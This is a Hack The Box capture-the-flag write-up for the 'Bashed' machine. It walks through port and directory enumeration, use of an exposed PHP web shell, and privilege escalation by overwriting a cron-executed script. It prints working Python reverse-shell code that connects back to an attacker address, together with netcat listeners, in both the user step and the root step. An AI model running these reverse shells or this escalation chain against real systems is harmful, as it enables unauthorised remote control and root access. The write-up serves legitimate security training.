HTB - Bashed

Getting Root:

Start with nmap and noticed that port 80 is the only port opened
Using gobuster we discover a directory called /dev which contains a phpwebshell
We get a reverse shell using python
Simple enumeration shows we can execute any commands as scriptmanager
Used sudo -u to become scriptmanager and create a reverse shell script in python which gets executed by root every 1 minute.

Nmap

# Nmap 7.80 scan initiated Mon Mar  2 12:37:01 2020 as: nmap -sC -sV -p- -oA nmap/Bashed 10.10.10.68
Nmap scan report for 10.10.10.68
Host is up (0.040s latency).
Not shown: 65534 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Arrexel's Development Site

Gobuster

gobuster dir -u http://10.10.10.68 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50 -x php -o Bashed_gobuster.txt   
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.68
[+] Threads:        50
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     php
[+] Timeout:        10s
===============================================================
2020/03/02 12:50:38 Starting gobuster
===============================================================
/uploads (Status: 301)
/php (Status: 301)
/css (Status: 301)
/images (Status: 301)
/dev (Status: 301)
/js (Status: 301)
/config.php (Status: 200)
/fonts (Status: 301)
/server-status (Status: 403)
===============================================================
2020/03/02 12:56:42 Finished
===============================================================

Gobuster discovered a directory named /dev which includes a phpwebshell.

Getting a Reverse Shell

Using a python reverse shell

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.20",9001));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Started the listener

rlwrap nc -lnvp 9001
listening on [any] 9001 ...
connect to [10.10.14.20] from (UNKNOWN) [10.10.10.68] 57102 
/bin/sh: 0: can't access tty; job control turned off
$

Improving the shell

python -c 'import pty;pty.spawn("/bin/bash")'

Privilege Escalation

Using linpeas.sh, the following is very interesting: linpeas.sh GitHub: https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite

                                                                                                                                                                                                                                              
[+] Testing 'sudo -l' without password & /etc/sudoers                                                                                                                                                                                         
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#commands-with-sudo-and-suid-commands                                                                                                                                          
Matching Defaults entries for www-data on bashed:                                                                                                                                                                                             
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin                                                                                                                         
                                                                                                                                                                                                                                              
User www-data may run the following commands on bashed:                                                                                                                                                                                       
    (scriptmanager : scriptmanager) NOPASSWD: ALL

That means we can run any command as user scriptmanager

www-data@bashed:/dev/shm$ sudo -u scriptmanager whoami
sudo -u scriptmanager whoami
scriptmanager
www-data@bashed:/dev/shm$ 

www-data@bashed:/dev/shm$ sudo -u scriptmanager id
sudo -u scriptmanager id
uid=1001(scriptmanager) gid=1001(scriptmanager) groups=1001(scriptmanager)
www-data@bashed:/dev/shm$ 

www-data@bashed:/dev/shm$ sudo -u scriptmanager /bin/bash
sudo -u scriptmanager /bin/bash
scriptmanager@bashed:/dev/shm$ 

scriptmanager@bashed:/dev/shm$ id
id
uid=1001(scriptmanager) gid=1001(scriptmanager) groups=1001(scriptmanager)

The user scripmanager can access the /scripts directory (this shows on the linpeas.sh but www-data couldn't access it)

# output from linpeas.sh                                                                                                                                                                                                                                              
[+] Interesting writable Files                                                                                                                                                                                                                
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-files                                                                                                                                                                
/dev/mqueue                                                                                                                                                                                                                                   
/dev/shm                                                                                                                                                                                                                                      
/dev/shm/linpeas.sh                                                                                                                                                                                                                           
/run/lock                                                                                                                                                                                                                                     
/scripts                                                                                                                                                                                                                                      
/scripts/test.py

There are two files there. It seems like something is executing the test.py script with root privileges because if you mv test.txt test.bkp, after some time, the file gets created again and is owned by root.

# File named test.py
cat test.py
f = open("test.txt", "w")
f.write("testing 123!")
f.close


# File named test.txt OWNED by root!!! (huh??)
scriptmanager@bashed:/scripts$ cat test.txt
cat test.txt
testing 123!scriptmanager@bashed:/scripts$


# These are the file permissions
drwxrwxr--  2 scriptmanager scriptmanager 4096 Mar  2 12:04 .                                                          │|       CVE-2018-17199  5.0     https://vulners.com/cve/CVE-2018-17199                                                
drwxr-xr-x 23 root          root          4096 Dec  4  2017 ..                                                         │|       CVE-2018-1333   5.0     https://vulners.com/cve/CVE-2018-1333
-rwxr--r--  1 scriptmanager scriptmanager   58 Dec  4  2017 test.py                                                    │|       CVE-2017-9798   5.0     https://vulners.com/cve/CVE-2017-9798
-rw-r--r--  1 root          root            12 Mar  2 11:07 test.txt

You can modify the test.py script (this script is owned by user scriptmanager, which is our user) and see if you can get a reverse shell with root privileges. As you can see below, I reused the same exact reverse python shell I used to get user but this time I changed the formatting a little bit.

#!/usr/bin/python

import socket,subprocess,os

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.10.14.20",9002))
os.dup2(s.fileno(),0) 
os.dup2(s.fileno(),1) 
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])

We get a shell as root

rlwrap nc -lnvp 9002                                                              
listening on [any] 9002 ...                                                                                            
connect to [10.10.14.20] from (UNKNOWN) [10.10.10.68] 59522                                                            
/bin/sh: 0: can't access tty; job control turned off                                                                   
# id                                                                                                                   
uid=0(root) gid=0(root) groups=0(root)                                                                                 
# python -c 'import pty;pty.spawn("/bin/bash")'

Investigating a little bit into what was executing the test.py on the /scripts directory, we noticed that root had a cron job running which executes all python scripts every minute

                                                                                                                                            
root@bashed:/scripts# crontab -l                                                                                       
crontab -l                                                                                                             
* * * * * cd /scripts; for f in *.py; do python "$f"; done

If you want to learn a little bit more about crontab, check out this site below:

PreviousHTB - Haystack NextHTB - Blue

Last updated 4 years ago